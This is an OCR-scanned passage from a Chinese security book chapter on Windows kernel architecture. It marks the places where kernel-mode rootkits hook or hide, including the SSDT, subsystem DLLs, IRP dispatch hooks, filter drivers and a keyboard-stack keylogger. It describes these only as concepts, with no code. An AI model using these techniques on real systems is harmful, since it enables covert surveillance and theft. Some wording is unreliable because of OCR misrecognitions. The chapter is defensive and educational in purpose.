别 的 代码 ， 以 便 执行 必要 的 任务 。 换 句 话 说 ，CPU 能 够 动态 地 根据 需要 将 特权 从 Ring3 提 升 为 Ring0。 这 种 迁移 发 生 在 一 个 用 户 
模式 线程 直接 或 者 由 于 请 求 对 特权 系统 资源 的 访问 而 运行 如 下 某 项 内 容 时 : 


- 特殊 CPU 指 令 SYSENTER 


系统 调用 


.中断 或 者 其 他 安装 的 调用 门 〈call gate) 


这 种 迁移 由 操作 系统 控制 并 使 用 CPU 指令 集 实 现 ， 在 线程 需要 使 用 受 限 的 CPU 指令 或 者 执行 一 个 特权 操作 (例如 直接 访问 
硬件 ) 时 执行 。 在 发 起 系统 调用 或 者 调用 门 时 ， 操 作 系统 将 请 求 的 控制 权 交 给 对 应 的 内 核 组 件 〈 例 如 驱动 程序 ) ， 该 组 件 代 表 提 
出 请 求 的 用 户 模式 线程 执行 特权 操作 并 且 返 回 所 有 结果 。 这 个 操作 通常 导致 一 次 或 者 多 次 线程 上 下 文 切换 ， 因 为 操作 系统 代码 换 
出 用 户 代 码 ， 以 完成 更 高 特权 的 请 求 。 


通常 ， 调 用 门 以 中 断 的 形式 实现 ， 表 现 为 x86CPU 的 INT 指 令 ， 但 是 OS 能 够 为 特定 的 进程 安装 可 以 通过 全 局 描述 符 
表 (GDT) 或 者 局 部 描述 符 表 (LDT) 访问 的 许多 调用 门 。 这 些 表格 存储 一 些 内 存 分 段 描述 符 的 地 址 ， 这 些 摘 述 符 指向 调用 门 被 
调用 时 执行 的 预先 安装 的 可 执行 代码 。 


系统 调用 的 执行 实例 之 一 是 当 程 序 发 出 一 个 INT 指 令 以 及 表示 所 发 起 的 中 断 的 数字 参数 时 。 发 生 这 种 情况 时 ， 操 作 系统 处 理 
中 令 ， 并 且 将 控制 权 转 给 合适 的 被 登记 用 于 处 理 该 中 断 的 内 核 模式 组 件 。 


SYSENTER 是 更 现代 的 指令 ， 它 被 优化 为 直接 从 用 户 模式 迁移 为 内 核 模式 ， 而 没有 登记 和 处 理 中 断 的 开销 。 


4.1.4 内 核 模式 : 数字 化 的 西部 蛮荒 


简单 地 概括 ， 内 核 模式 就 是 处 理 器 在 执行 操作 系统 代码 (包括 设备 驱动 程序 ) 时 所 处 的 特权 模式 。 用 户 应 用 程序 运行 于 用 户 
模式 ， 这 时 处 理 器 运行 在 较 低 的 特权 级 别 中 。 在 这 种 较 低 的 特权 级 别 下 ， 用 户 应 用 程序 不 能 使 用 和 内 核 代 码 相同 的 CPU 指令 和 
物理 硬件 。 因 为 用 户 模式 和 内 核 模式 程序 都 必须 利用 系统 内 人 存 来 运行 ， 所 以 两 者 的 内 人 存 空 间 从 逻辑 上 分 离 ， 内 存 中 的 每 页 都 用 处 
理 器 使 用 该 页 所 必需 的 相应 访问 模式 来 标识 。 用 户 模式 程序 在 生命 周期 中 部 分 时 间 必 须 在 核心 模式 下 执行 各 种 操作 (其 中 最 多 的 
是 利用 内 核 模式 的 图 形 程序 库 来 进行 窗口 操作 ) ， 因此， 正如 前 面 所 讨论 的 ，SYSENTER 这 样 的 处 理 器 指令 被 用 来 进行 迁移 。 操 
作 系 统 使 用 这 条 指令 对 用 户 模 式 程序 设置 陷阱 ， 在 允许 程序 进入 更 高 的 处 理 器 特权 访问 模式 (也 就 是 Ring0) 之 前 ， 对 调用 函数 
的 参数 进行 基本 的 验证 。 


内 核 空间 是 极端 多 变 的 环境 ， 所 有 执行 中 的 代码 都 有 相同 的 特权 、 访 问 权 和 能 力 。 因 为 内 存 地 址 空间 不 像 用 户 模 式 的 进程 一 
样 是 分 离 的 ， 所 以 内 核 模式 中 的 任何 程序 都 可 以 访问 其 他 任何 程序 (包括 操作 系统 本 身 的 程序 ) 的 内 存 、 数 据 和 堆栈 。 实 际 上 ， 
任何 组 件 都 能 将 自身 登记 为 任何 类 型 数据 的 处 理 程序 一 一 这 些 数 据 包括 网 络 流量 、 击 键 、 文 件 系统 信息 等 ， 而 不 需要 考虑 是 否 
需要 访问 这 些 信 息 。 唯 一 的 限制 是 : 你 必须 “承诺 ”按照 规则 办 事 。 如 果 你 没有 遵守 规则 ， 就 会 导致 冲突 并 使 整个 系统 月 溃 。 


上 述 情况 造成 了 一 个 非常 复杂 和 混乱 的 环境 。 任 何 了 解 基本 需求 和 足够 的 C 语 言 知识 的 人 都 是 危险 的 ， 他 们 可 以 开发 一 个 核 
心 驱 动 程序 ， 装 载 这 个 程序 ， 然 后 开始 在 这 个 环境 中 币 律 。 问 题 是， 这 里 没有 你 的 代码 的 运行 时 和 控制 验证 一 一 没有 内 建 的 异 
常 处 理 程序 来 捕捉 你 的 逻辑 流向 或 者 编码 错误 。 如 果 你 废弃 一 个 空 指针 ， 就 会 使 系统 出 现 蓝屏 错误 (崩溃 ) 。 尽 管 Microsoft 做 
出 了 很 大 的 努力 来 建立 内 核 模式 体系 结构 的 文档 ， 为 内 核 开 发 人 员 提 供 天 于 最 佳 实践 的 非常 清晰 的 建议 ， 但 是 这 一 切实 际 上 仍然 
依赖 于 软件 人 员 写 出 没有 缺陷 的 代码 。 我 们 也 知道 那样 的 想法 会 将 我 们 带 向 何方 。 





4.2 目标: Windows 内 核 组件 


现在 我 们 已 经 有 了 混乱 的 内 核 模式 环境 的 基础 知识 ， 可 以 讨论 使 操作 系统 发 出 咬 噶 声 (就 像 定时 炸弹 ) 的 庞大 子 系统 和 执行 
组 件 。 我 们 按照 自 上 而 下 的 方式 介绍 这 些 组 件 ， 并 指出 其 弱点 及 /或 内 核 模 式 Rootkit 一 般 隐藏 的 位 置 。 我 们 将 会 经 常 参考 图 4- 
2， 该 图 提供 了 Windows 内 核 体系 结构 的 一 个 概略 图 。 
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图 4-2 Windows 内 核 模式 体系 结构 


4.2.1 Win32 子 系统 


Win32 子 系统 是 Windows 中 的 3 个 环境 子 系统 之 一 ， 这 3 个 子 系统 是 : Win32、POSIX 和 OS/2 (Windows XP 中 只 有 
Win32) 。 在 本 书 中 ， 我 们 将 更 多 地 集中 于 Win32 子 系统 。Win32 环 境 子 系统 负责 在 Windows 执 行 层 为 用 户 模式 应 用 程序 和 服 


务 代理 内 核 模式 功能 。 这 个 子 系统 具有 内 核 模式 组 件 (主要 是 Win32k.sys) 和 用 户 模式 组 件 (最 主要 是 csrss.exe (客户 端 /服务 
器 运行 时 主 系统 ) 和 子 系统 DLL) 。 


子 系统 DLL 作为 必须 使 用 一 部 分 核心 模式 所 提供 功能 的 32 位 程序 的 网 关 。 这 个 功能 由 Windows Executive 提 供 。 尽 管 Win32 
子 系统 DLL 不 是 内 核 模式 组 件 ， 但 是 它们 仍然 是 内 核 模式 Rootkit 的 高 价值 目标 。 这 些 DLL 为 用 户 应 用 程序 甚至 系统 服务 进程 提供 
入 口 。 因 此 ， 污 染 这 些 入 口 将 扩展 Rootkit 在 任何 用 户 模式 应 用 程序 上 的 能 力 。 


Win32k.sys 是 处 理 用 户 模式 的 图 形 操作 调用 的 内 核 驱 动 程序 ， 实 现 于 图 形 设备 接口 (GDI) 之 中 。 这 个 驱动 程序 处 理 用 户 体 
验 的 核心 ， 如 菜单 、 绘 制 窗口 、 鼠 标 和 键盘 图 形 ， 以 及 屏幕 特效 。 外 部 图 形 驱 动 程序 也 可 以 看 作 Win32 子 系统 的 一 部 分 。 


42.2 ”这 些 API 究 竟 是 什么 


Windows 有 两 种 主要 的 API 类 型 : Win32API 主 要 由 用 户 模式 程序 使 用 ， 原 生 (Native) API 由 内 核 模式 程序 使 用 。 这 种 分 
类 的 结果 是 ， 大 部 分 Win32API 只 是 调用 原生 API 的 存根 (stub， 在 调用 实际 函数 之 前 检查 参数 的 小 型 二 进 制程 序 ) ， 其 中 一 些 
API 依 次 调用 Windows 内 核 中 埋藏 的 未 在 文档 中 列 出 的 内 部 函数 。 


Win32API 在 前 面 提 到 的 4 个 主要 Win32 子 系统 DLL 中 实现 : 

-kernel32.dll 为 访问 文件 系统 、 设 备 、 创 建 线程 和 进程 以 及 内 存 管理 提供 基本 服务 。 
advapi32.dl| 为 操纵 Windows 组 件 ( 如 注册 表 和 用 户 账户 ) 提供 高 级 服务 。 
-user32.dll 实现 窗口 和 图 形 结构 ， 如 按钮 、 和 鼠标 指针 等 。 

. gdi32.dll 提供 显示 器 和 输出 设备 的 访问 。 


这 些 DLL 中 的 某 些 函 数 在 DLL 中 直接 以 用 户 模式 实现 。 但 是 ， 这 些 函 数 的 重要 部 分 需要 访问 内 核 模 式 中 Windows Executive 
内 部 的 服务 ， 基 本 文件 输入 /输出 (1/0) (如 Win32API 函 数 ReadFile () 和 WriteFile () ) 就 是 其 中 一 个 例子 。 因 此 ， 当 用 户 
模式 应 用 程序 调用 kernel32.dll 中 的 ReadFile () 时 ，ReadFile () 实际 调用 另 一 个 函数 NtReadFile () ， 这 个 函数 从 内 核 模 式 
的 IO 管理 器 中 输出 。 每 当 应 用 程序 需要 使 用 任何 子 系统 DLL 中 的 阔 数 时 ，Windows 装 入 程序 将 会 动态 地 将 这 些 程序 库 输 入 到 应 
用 程序 的 地 址 空间 中 。 

正如 前 面 提 到 的 ， 这 些 DLL 常 常 成 为 Rootkit 的 目标 ， 这 是 因为 这 些 DLL 为 用 户 模式 应 用 程序 揭示 的 核心 功能 。 通 过 挂钩 和 破 
坏 这 些 DLL 或 者 实现 DLL 所 揭示 功能 的 内 核 模 式 ，Rootkit 马 上 在 系统 上 得 到 一 个 牢固 的 立足 点 。 


4.2.3 守门 人 : NTDLLDLL 


如 果子 系统 DLL 是 进入 内 核 空 间 的 入 口 ， 那 么 NTDLL.DLL 就 是 它们 到 达 内 核 空 间 之 前 必须 首先 经 过 的 桥梁 。 这 个 DLL 为 从 用 
户 模 式 调用 系统 服务 以 及 Windows 组 件 所 使 用 的 未 归档 支持 函数 提供 了 一 个 小 的 存根 程序 。 每 个 从 用 户 模式 到 内 核 模式 的 函数 
调用 都 必须 通过 NTDLL.DLL， 所 调用 的 存根 执行 以 下 这 几 个 基本 任务 : 


- 验证 所 有 传 入 缓冲 或 者 参数 。 
- 查找 并 且 调 用 Executive 中 对 应 的 系统 服务 函数 。 
通过 发 出 SYSENTER 或 者 其 他 体系 结构 专用 指令 迁移 到 内 核 模式 。 


和 子 系统 DLL 一 样 ， 这 个 DLL 也 是 内 核 模 式 Rootkit 挂 钧 和 隐藏 的 地 方 。 


424 委员 会 功能 : Windows Executive (NTOSKRNL.EXE) 


Windows Executive 人 存在 于 文件 ntoskrnl.exe 中 ， 实 现 NTDLL.DLL 输 出 的 函数 。 这 些 函 数 通常 被 叫 作 系统 服务 ， 也 是 系统 服 
务 调 度 表 (SSDT) 指向 的 入 口 。SSDT 是 恶意 软件 /Rootkit 和 合法 的 安全 产品 最 经 常 插入 以 控制 程序 执行 流程 的 位 置 。 


Executive 实 际 上 由 实现 各 种 系统 服务 核心 的 许多 子 组 件 构成 。 这 些 子 组 件 包括 配置 管理 器 、 电 源 管理 器 、I/O 管 理 器 、 即 插 
即 用 管理 器 以 及 许多 其 他 组 件 。 所 有 这 些 组 件 可 以 从 用 户 模式 非 直接 地 通过 Win32API 以 及 直接 地 从 内 核 模式 通过 以 Rtl、Mm、 
Ps 等 开始 的 API 函 数 访问 。 


Executive 也 是 设备 驱动 程序 与 用 户 模式 的 接口 。Executive 输 出 大 量 只 有 驱动 程序 能 够 调用 的 函数 。 这 些 函 数 被 统称 
为 Windows 原 生 APl。 


接 下 来 要 描述 的 内 核 包 含 了 大 量 未 写 入 文档 的 特性 和 遂 数 ， 为 内 核 模 式 Rootkit 所 利用 。 
4.2.5 Windows 内 核 (NTOSKRNL.EXE) 


NTOSKRNL.EXE 的 第 二 个 主要 部 分 是 Windows 实 际 上 的 内 核 。 这 个 内 核 负责 管理 系统 资源 并 调度 使 用 这 些 资 源 的 线程 。 为 
了 调度 和 功能 性 ， 内 核 揭示 了 一 些 函 数 和 数据 结构 ， 例 如 内 核 程 序 所 使 用 的 同步 原 语 。 内 核 还 通过 硬件 抽象 层 (HAL) 与 硬件 接 
口 并 且 使 用 汇编 代码 执行 特殊 的 与 体系 结构 相关 的 CPU 指令 。 


内 核 本 身 输出 一 组 函数 供 其 他 内 核 程序 使 用 。 这 些 函 数 以 Ke 开始 ， 并 且 记 入 Windows 驱 动 程序 开发 包 (DDK) 的 文档 中 。 
内 核 的 另 一 个 任务 是 为 驱动 程序 抽象 一 些 低级 硬件 。 


这 些 内 核 提 供 的 函数 帮助 驱动 程序 更 简单 地 完成 任务 ， 但 是 它们 也 帮助 Rootkit 作 者 编写 驱动 程序 来 利用 系统 。 事 实 很 简 
单 ，Windows 内 核 是 有 意 暴露 的 ， 意 图 是 帮助 硬件 制造 商 和 软件 开发 人 员 扩 展 操作 系统 的 功能 与 特性 。 尽 管内 核 在 某 种 程度 上 


与 Windows Executive 和 未 写 入 文档 的 内 部 数据 机 构 和 例 程 隔绝 而 受到 保护 ， 但 是 仍然 在 很 大 程度 上 暴露 给 了 其 他 内 核 组 件 ， 
包括 Rootkit。 


42.6 ”设备 驱动 程序 


设备 驱动 程序 存在 的 首要 原因 是 通过 HAL 与 物理 硬件 设备 接口 。 一 个 简单 的 例子 是 从 设备 读 取 并 且 翻 译 键盘 扫描 码 ， 并 且 将 
其 转换 为 操作 系统 所 用 的 数据 结构 或 者 事件 的 键盘 驱动 程序 。 设 备 驱 动 程序 有 许多 种 风格 ， 但 是 一 般 使 用 C 语 言 或 者 汇编 语言 编 


写 ， 具 有 .sys 或 者 .ocx 扩展 名 。 一 个 可 装 入 的 内 核 模块 也 相似 ， 但 是 一 般 仅 包含 支持 例 程 (而 不 是 核心 功能 ) ， 在 驱动 程序 输出 
的 一 个 DLL 中 实现 。 


但 是 ， 除 了 运行 硬件 的 任务 之 外 ， 设 备 驱动 程序 因为 各 种 原因 也 被 用 来 访问 内 核 模式 组 件 和 操作 系统 数据 结构 。 这 是 设备 驱 
动 程序 的 合法 用 途 ，Windows 包 含 了 许多 这 样 的 驱动 程序 。 这 意味 着 许多 驱动 程序 并 不 对 应 任何 的 物理 设备 。 


设备 驱动 程序 是 Windows 操 作 系统 体系 结构 中 的 独特 组 件 ， 因 为 它们 具有 直接 与 硬件 交流 或 者 使 用 内 核 和 Windows 
Executive 输 出 的 函数 的 功能 。 注 意图 4-2 中 ， 驱 动 程序 并 不 位 于 内 核 甚 至 HAL 之 上 ， 而 是 与 之 相 邻 。 这 意味 着 它们 具有 相同 的 地 
位 ， 与 同 硬件 交互 的 那些 组 件 之 间 很 少 甚至 没有 依赖 天 系 。 昌 然 驱动 程序 可 以 选择 将 Executive 用 于 像 内 存 映射 (将 虚拟 地 址 转 
换 为 物理 地 址 ) 以 及 MO 处 理 这 样 的 任务 ， 使 用 内 核 来 进行 线程 上 下 文 切换 ， 但 是 也 可 以 在 自己 的 例 程 中 实现 这 些 功 能 并 且 将 这 
些 功能 输出 到 用 户 模式 。 


这 种 极度 的 灵活 性 对 系统 既是 增强 也 是 威胁 。 昌 然 它 使 Windows 非 常 灵活 并 且 “ 可 插入 ” ， 也 使 系统 处 于 有 缺陷 和 恶意 的 
驱动 程序 的 威胁 之 下 。 


4.2.7 ”Windows 硬 件 抽象 层 (HAL) 


内 核 (NTOSKRNL.EXE) 与 影响 系统 性 能 (如 缓冲 和 多 处 理 器 环境 ) 的 指令 集体 系 结构 的 可 移植 性 和 细微 差别 也 有 很 大 天 
系 。HAL 负 责 实现 处 理 这 些 不 同 配置 和 体系 结构 的 代码 。HAL 包 含 在 hal.dll 文 件 中 ， 这 个 文件 在 系统 启动 期 间 装 入 内 核 时 由 


NTOSKRNL.EXE 输 入 。 因 为 Windows 内 核 设计 为 支持 多 种 平台 ， 在 启动 时 根据 检测 到 的 平台 (PC、 赃 入 式 设 备 等 ) 选择 合适 的 
HAL 类 型 和 参数 。 


当今 的 内 核 Rootkit 很 少 对 付 HAL， 因 为 这 要 人 花费 许多 不 必要 的 精力 ， 内 核 中 有 许多 其 他 更 容易 藏身 的 位 置 。 


4.3 内核 驱 动 程序 概念 


本 节 将 介绍 驱动 程序 、 驱 动 程序 类 型 、Windows 驱 动 程序 模型 和 框架 ， 以 及 驱动 程序 满足 系统 可 用 性 的 各 种 需求 的 细节 。 
这 些 主题 对 于 理解 内 核 模 式 Rootkit 和 体会 它们 运用 系统 的 能 力 是 很 关键 的 。 在 我 们 介绍 驱动 程序 框架 细节 时 ， 将 指出 经 常 被 
Rootkit 作 者 侵害 的 领域 。 


尽管 我 们 将 介绍 内 核 驱动 程序 的 基本 组 件 ， 但 是 不 会 提供 样 例 代 码 。 源 代码 和 编写 内 核 驱动 程序 的 细节 请 参考 附录 。 


警告 : 重要 的 提醒 和 警告 : 本 节 的 意图 不 是 为 了 欺骗 读者 考虑 开始 载 入 定制 的 设备 驱动 程序 。 你 在 开发 驱动 程序 时 必须 考虑 
数 百 种 细微 的 差别 、 附 加 条 款 和 假设 问题 。 在 编写 或 者 载 入 驱动 程序 (尤其 是 在 生产 系统 上 ) 之 前 请 参考 Windows 了 驱动 程序 开发 
包 文 档 中 的 必要 前 提 。 


4.3.1 内核 模式 驱动 程序 体系 结构 


到 Windows Vista 出 现 之 时 ，Windows 驱 动 程序 可 以 在 用 户 模式 或 者 内 核 模式 下 操作 。 用 户 模 式 驱动 程序 一 般 是 不 需要 低 
级 操作 系统 特性 的 打印 机 驱动 程序 。 而 内 核 模 式 驱 动 程序 与 Windows Executive 交 互 ， 以 获得 控制 设备 的 MO 管理 和 其 他 功能 。 


所 有 Windows 驱 动 程序 都 必须 遵循 一 种 驱动 程序 模型 ， 并 且 提 供 标准 的 驱动 程序 例 程 。 一 些 驱动 程序 还 实现 Windows 驱 动 
程序 模型 (WDM) ， 这 是 在 WDM 文 档 中 定义 的 一 个 标准 规则 和 例 程 集合 。 这 种 模型 要 求 驱动 程序 为 电源 管理 、 即 插 即 用 和 其 
他 特性 提供 例 程 。 我 们 不 详细 介绍 各 种 类 型 的 WDM 了 驱动 程序 ， 这 些 驱 动 程序 分 为 总 线 驱 动 程序 、 功 能 驱动 程序 和 过 滤器 驱动 程 
序 。 


总 线 驱 动 程序 为 一 个 总 线 控制 器 或 者 适配器 提供 服务 ， 并 且 枚 举 连接 的 设备 (思考 一 下 在 你 的 计算 机 上 的 许多 USB 端 口上 连 
接 了 多 少 设 备 ) 。 它 们 为 高 级 驱动 程序 提供 电源 操作 和 插入 /删除 警告 。 功 能 驱动 程序 是 总 线 驱 动 程序 的 上 一 层 ， 处 理 总 线 上 特 
定 设 备 的 操作 (如 读 / 写 ) 。 功 能 驱动 程序 的 子 类 型 包括 类 、 小 类 、 端 口 和 小 端口 。 最 后 ， 过 滤器 驱动 程序 是 可 以 插入 到 总 线 驱 
动 程序 之 上 的 任何 级 别 的 特殊 驱动 程序 ， 用 于 过 滤 特 定 的 /O 请 求 。 


这 些 总 线 驱 动 程序 、 功 能 驱动 程序 和 过 滤器 驱动 程序 是 分 层 的 (也 被 称 为 链 式 或 者 栈 式 ) 。 分 层 体系 结构 的 背景 思路 是 抽 
象 : 每 种 驱动 程序 随 着 堆栈 的 遍历 而 移 除 底层 硬件 的 复杂 性 。 最 低级 的 驱动 程序 处 理 固 件 并 且 直 接 与 硬件 通信 ， 但 是 只 把 必要 的 
和 请 求 信息 上 传 给 较 高 级 别 的 驱动 程序 ， 在 驱动 程序 链 中 有 3 种 类 型 的 驱动 程序 : 


“ 最 高 级 别 的 驱动 程序 ， 例 如 文件 系统 驱动 程序 。 
- 中 级 驱动 程序 ， 如 WDM 类 了 驱动 程序 或 者 过 滤器 驱动 程序 。 
- 最 低级 别 的 驱动 程序 ， 如 WDM 总 线 驱动 程序 。 


为 了 阐述 这 种 体系 结构 ， 考 虑 一 下 你 的 计算 机 上 的 硬盘 。 假 设 它 通过 一 个 SCSsI 连 接 器 插入 到 主板 上 。 板 载 的 连接 器 总 线 由 
一 个 最 低级 的 总 线 驱 动 程序 来 实现 ， 这 个 驱动 程序 用 于 响应 硬盘 中 的 硬件 事件 一 如 电源 开 / 关 、 睡 眠 /唤醒 等 。 总 线 驱 动 程序 还 
将 其 他 任务 传递 给 驱动 程序 堆栈 的 上 层 一 一 中 级 驱动 程序 ， 由 其 处 理 磁 盘 读 / 写 和 其 他 设备 相关 的 功能 (因为 一 个 SCS| 总 线 可 以 
运行 多 种 设备 ) 。 你 的 系统 也 可 能 包含 了 用 于 磁盘 加 密 的 中 级 过 滤器 驱动 程序 ， 以 及 用 于 定义 文件 系统 (例如 NTFS) 的 更 高 级 
的 驱动 程序 。 


Rootkit 很 少 作 为 最 低级 的 驱动 程序 (也 就 是 总 线 驱 动 程序 ) ， 因 为 低级 驱动 程序 处 理 特定 制造 商 的 硬件 的 细节 ， 开 发 和 测 
试 这 样 的 驱动 程序 极其 复杂 并 且 是 资源 密集 的 (需要 大 量 的 人 力 、 时 间 和 资金 ) 。 为 了 开发 可 靠 的 最 低级 驱动 程序 ， 你 需要 一 个 
成 熟 的 、 具 有 资金 支持 和 非常 有 针对 性 的 目标 。 而 且 ， 一 些 最 低级 的 总 线 驱动 程序 (如 系统 提供 的 SCSI 和 视频 端口 驱动 程序 ) 
不 能 蔡 换 ， 因 为 操作 系统 不 允许 这 么 做 ， 而 且 修 改过 的 版 本 不 能 工作 。Rootkit 更 可 能 作为 中 级 或 者 高 级 驱动 程序 来 感染 系统 ， 
因为 这 么 做 所 需要 的 努力 和 回报 之 间 的 比例 较为 合适 。 


这 种 分 层 的 设计 有 助 于 内 核 Rootkit 的 利用 。 专 门 的 Rootkit 作 者 可 以 根据 喜好 编写 一 个 在 驱动 程序 链 中 任意 位 置 的 驱动 程 
序 ， 修 改 传输 到 任何 上 层 或 者 下 层 驱动 程序 的 数据 。 扩 展 我 们 的 硬盘 的 例子 ， 想 象 一 下 ， 如 果 Rootkit 作 者 编写 一 个 过 滤器 驱动 
程序 来 拦截 数据 ， 并 且 在 数据 被 中 级 的 加 密 过 滤器 驱动 程序 加 密 之 前 进行 修改 。 因 为 过 滤器 驱动 程序 可 以 插入 到 任何 级 别 ( 低 、 
中 或 者 高 ) 中 ，Rootkit 可 以 在 数据 被 加 密 之 前 读 取 到 并 且 将 数据 通过 网 络 传输 。 因 此 ，Rootkit 可 以 在 数据 离开 加 密 过 滤器 驱动 
程序 之 后 修改 加 密 的 数据 ， 在 加 密 数据 内 部 存储 额外 的 信息 。 


由 于 分 层 复 杂 性 而 常常 被 Rootkit 作 者 利用 的 另 一 类 驱动 程序 是 网 络 驱动 程序 。 网 络 驱动 程序 有 各 种 网 络 交互 标准 如 OsI 模 
型 (例如 ，TCP/IP 协 议 栈 ) 的 附加 开销 。 因 此 ， 有 另外 两 种 类 型 的 驱动 程序 : 一 种 称 作协 议 驱 动 程序 : 位 于 驱动 程序 堆栈 的 最 
高 级 驱动 程序 之 上 ; 另 一 种 是 过 滤器 钩子 驱动 程序 ， 人 允许 程序 过 滤 封 包 。Microsoft 开 发 的 网 络 设备 接口 标准 (NDIS) 使 网 络 驱 
动 程序 开发 人 员 能 够 很 容易 实现 具有 OSI 参 考 模型 的 较 高 级 别 层次 的 低级 NIC 驱 动 程 序 。NDIS 之 上 的 传输 驱动 程序 接口 (TDI) 
实现 OSI 传输 层 。 


NDIS 和 TDI 为 Rootkit 提 供 了 安装 定制 协议 栈 的 机 会 ， 例 如 ， 未 向 任何 Windows Executive 组 件 注册 的 TCP/IP 协 议 栈 。 它 们 
还 使 Rootkit 作 者 有 机 会 在 现 有 的 驱动 程序 堆栈 中 插入 过 滤器 和 过 滤器 钩子 驱动 程序 ， 在 中 间 级 别 嗅 探 (并 且 在 此 过 程 中 修改 ) 
网 络 封包 。 


4.3.2 ”整体 解剖 : 框架 驱动 程序 


用 于 开发 驱动 程序 的 工具 并 不 特殊 。 驱 动 程序 一 般 以 C 或 C++ 语言 编写 ， 使 用 Windows 驱 动 程序 开发 工具 包 (DDK) 编译 
器 和 链接 程序 编译 。 虽 然 这 种 构建 环境 是 基于 命令 行 的 ， 但 是 也 可 以 在 Visual Studio 及 其 他 IDE 中 开发 驱动 程序 ， 只 要 这 些 IDE 
配置 为 使 用 DDK 构 建 环境 编译 驱动 程序 就 可 以 了 。 驱 动 程序 应 该 根据 是 否 为 NDM 驱 动 程序 包括 标准 的 头 文件 ntddk.h 或 者 
wdm.h。 构 建 环境 有 两 种 风格 : checked build (用 于 调试 ) 和 free build (用 于 发 行 ) 。 


驱动 程序 要 正常 装 入 ， 必 须 包 含 必要 的 驱动 程序 例 程 。 必 要 的 例 程 根据 所 使 用 的 驱动 程序 模型 (我 们 假设 为 WDM ) 而 有 所 
不 同 ,但 是 所 有 驱动 程序 都 必须 包括 : 


-DriverEntry () 初始 化 驱动 程序 和 使 用 的 数据 结构 ; 这 个 函数 在 驱动 程序 装 入 时 由 操作 系统 自动 调用 。 
-AddDevice () ”将 驱动 程序 连接 到 系统 中 的 设备 ;驱动 程序 可 以 是 物理 实体 或 者 虚拟 实体 ， 例 如， 键盘 或 者 逻辑 卷 。 
调度 进程 ”处理 I/O 请 求 包 (IRPs) ， 这 是 定义 Windows 中 I/O 模 型 的 底层 数据 结构 。 

- Unload () 在 驱动 程序 卸载 及 释放 系统 资源 时 调用 。 


根据 需要 ， 驱 动 程序 可 以 选择 包含 和 扩展 许多 其 他 的 系统 定义 的 例 程 ， 这 取决 于 驱动 程序 预期 提供 服务 的 设备 类 型 ， 以 及 该 
驱动 程序 在 驱动 程序 链 中 插入 的 位 置 。 


这 些 必 要 的 例 程 都 代表 了 Rootkit 接 管内 核 模式 中 的 其 他 驱动 程序 的 一 个 领域 。 使 用 AddDevice () ，Rootkit 可 以 连接 到 现 
有 的 驱动 程序 堆栈 一 一 这 是 过 滤器 驱动 程序 连接 到 一 个 设备 的 主要 方法 。 调 度 例 程 在 驱动 程序 从 较 低 或 者 较 高 级 别 的 驱动 程序 
接收 IRP 时 调用 ， 处 理 IRP 中 的 数据 。1IRP 钩 子 通过 履 盖 驱动 程序 调度 例 程 的 功能 代码 ， 使 其 指向 Rootkit 的 调度 例 程 。 这 有 效 地 


将 所 有 用 于 原始 驱动 程序 的 IRP 重 定向 到 Rootkit 驱 动 程序 。 


驱动 程序 也 依赖 于 标准 的 Windows 数 据 结 构 来 进行 一 些 有 意义 的 工作 。 所 有 驱动 程序 必须 处 理 3 种 关键 结构 ， 这 些 也 可 能 和 
Rootkit 有 关 : 


. |/O 请 求 包 (IRP) ”所 有 I/O 请 求 ( 例 如 ,键盘 、 和 鼠标 和 磁盘 操作 ) 由 操作 系统 (具体 地 说 是 Windows Executive 中 的 1/O 
管理 器 ) 创建 的 ITRP 数 据 结构 表示 。IRP 是 一 个 包含 请 求 代码 、 指 向 用 户 缓冲 区 的 指针 、 指 向 内 核 缓冲 区 的 指针 ， 以 及 许多 其 他 
参数 的 字段 的 整体 结构 。 


a 


‘DRIVER OBJECT 包含 了 I/O 管 理 器 为 发 送 IRP 给 驱动 程序 所 必须 知道 的 函数 入 口 点 地 址 表 。 这 个 数据 结构 由 驱动 程序 本 


身 的 DriverEntry () 函数 填写 。 


- DEVICE OBJECT 一 个 设备 〈 例 如 键盘 、 和 鼠标 、 硬 盘 ， 甚 至 不 表现 物理 硬件 的 虚拟 设备 ) 由 一 个 或 者 多 个 
DEVICE_OBJECT 结 构 表 示 ， 这 些 结构 被 组 织 为 设备 栈 。 当 为 一 个 设备 创建 IRP 时 ( 按 下 一 个 键 或 者 初始 化 一 个 文件 读 取 操 
作 ) ，OS 将 IRP 发 送 给 设备 栈 中 的 第 一 个 驱动 程序 。 每 个 在 设备 栈 中 登记 了 设备 的 驱动 程序 都 有 机 会 在 传递 IRP 或 者 完成 IRP 之 前 
对 其 进行 某 些 操作 。 


这 些 数据 结构 都 代表 着 内 核 模式 Rootkit 的 一 个 目标 。 无 疑 ，MMO 管 理 器 因为 管理 这 些 数 据 结构 也 变 成 了 一 个 目标 。 击 键 记录 
程序 Rootkit 常 用 的 一 种 技术 是 创建 一 个 DEVICE_OBJECT， 并 且 将 其 连接 到 操作 系统 的 键盘 设备 栈 。 现 在 Rootkit 驱 动 程序 被 注 
册 为 处 理 键盘 设备 的 IRP， 它 将 接收 键盘 |/O 管 理 器 创建 的 每 个 IRP。 例 如 ， 这 意味 着 Rootkit 有 机 会 检查 这 些 封包 ， 并 且 将 其 复 
制 到 一 个 日 志文 件 中 。 相 同 技术 也 可 以 应 用 到 网 络 和 硬盘 设备 栈 。 


4.3.3 WDF、KMDF 和 UMDF 


WDM 不 是 Windows 支 持 的 唯一 驱动 程序 模型 。 实 际 上 ，Microsoft 建 议 老练 的 驱动 程序 开发 人 员 移 植 到 最 近 重 新 设计 的 内 
核 驱动 程序 框架 ， 这 种 框架 被 恰当 地 命名 为 Windows 驱 动 程序 基础 (WDF) 。WDF 是 Microsoft 作 为 “下 一 代 驱 动 程序 模 
型 ”推出 的 ， 由 两 个 子 框架 组 成 : 内 核 模式 驱动 程序 框架 (KMDF) 和 用 户 模式 驱动 程序 框架 (UMDF) 。 


推动 这 一 内 核 驱 动 程序 体系 结构 重 设计 的 目标 是 ， 抽 象 驱动 程序 开发 的 某 些 低级 细节 ， 使 开发 人 员 更 容易 编写 持久 而 稳定 的 
内 核 代 码 。 简 而 言 之 ， 每 个 框架 程序 库 中 提供 的 API 和 接口 比 传 统 的 WDM 更 容易 使 用 ， 需 要 的 必 备 服务 例 程 也 更 少 。KMDF 通 
过 封装 WDM 来 做 到 这 一 点 。UMDF 是 Microsoft 开 始 将 不 必要 的 驱动 程序 从 内 核 模 式 移 出 到 用 户 模式 的 一 次 尝试 ， 这 些 驱 动 设 
备 包括 相机 、 便 携 音 乐 播放 器 和 幅 入 式 设备 。 


44 内 核 模 式 Rootkit 


